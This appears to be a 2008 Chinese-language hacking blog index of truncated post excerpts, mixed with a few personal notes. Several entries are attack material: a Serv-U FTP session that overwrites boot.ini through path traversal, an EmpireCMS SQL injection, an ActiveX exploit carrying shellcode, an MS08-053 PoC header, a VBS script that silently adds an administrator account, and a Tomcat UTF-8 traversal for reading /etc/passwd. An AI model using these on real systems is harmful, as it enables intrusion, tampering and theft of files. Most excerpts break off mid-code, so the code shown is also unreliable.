2008-10-04 16:40
#Serv-U 7.2.0.1 ftp file replacement
#user must have upload permissions //必须允许用户上传文件
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewrited //boot.ini被重写 |
2008-09-28 19:18
帝国ECMS /e/member/list/index.php注入漏洞
帝国ECMS /e/member/list/index.php文件:
if($sear)
{
$keyboard=RepPostVar2($_GET['keyboard']);
if($keyboard)
{
$add.=$where.$user_username." like '%$keyboard%'";
}
$search.="&sear=1&keyboard=$keyboard";
}
判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为
空就直接把keyboard带入查询产生注射漏洞.
|
2008-09-22 15:40
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00 |
2008-09-14 18:51
<html>
<pre>
=============================================================================
MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow
=============================================================================
Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2
Found by : Nguyen Minh Duc and Le Manh Tung
Advisory : http://www.microsoft.com/technet/security/Bulletin/MS0 |
2008-08-28 15:59
今天看了dream的问题忽然就想到了这个
VBS在活动目录部分有一个winnt对象,用来管理本地资源,利用他可以不依靠CMD等命令来添加管理员。
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","abc")
od.SetPassword "123"
od.SetInfo
Set of=GetObject(os |
2008-08-23 10:45
最近好像总是糊里糊涂的,昨天又出了这么档子事,感觉很对不住大家。恩,休息一段时间吧,专心学习无线网络渗透。
|
2008-08-20 15:58
2008-08-14 14:12
16岁了,哎................该来的人没来啊,这顿饭吃着还有什么意思??
算了........ 开心起来吧小伙..
You ary best !
|
2008-08-12 17:32
Apache Tomcat出了一个类似当年IIS url 编码的漏洞。
漏洞发生在Apache Tomcat处理UTF-8编码时,没有正确转换,从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式,使得可以遍历系统任意文件,包括/etc/passwd等
触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项
漏洞测试代码如下:
Dim strUrl,strSite
showB()
Set Args = Wscript.Arguments
If Args.Count <> 1 Then
ShowU()
Else
str |
2008-08-12 12:25
Title: Apache Tomcat Directory Traversal Vulnerability
Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote File Disclosure
Vulnerable Version: prior to 6.0.18
Solution:
- Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)
- Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.
- Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix unt |
|
| 
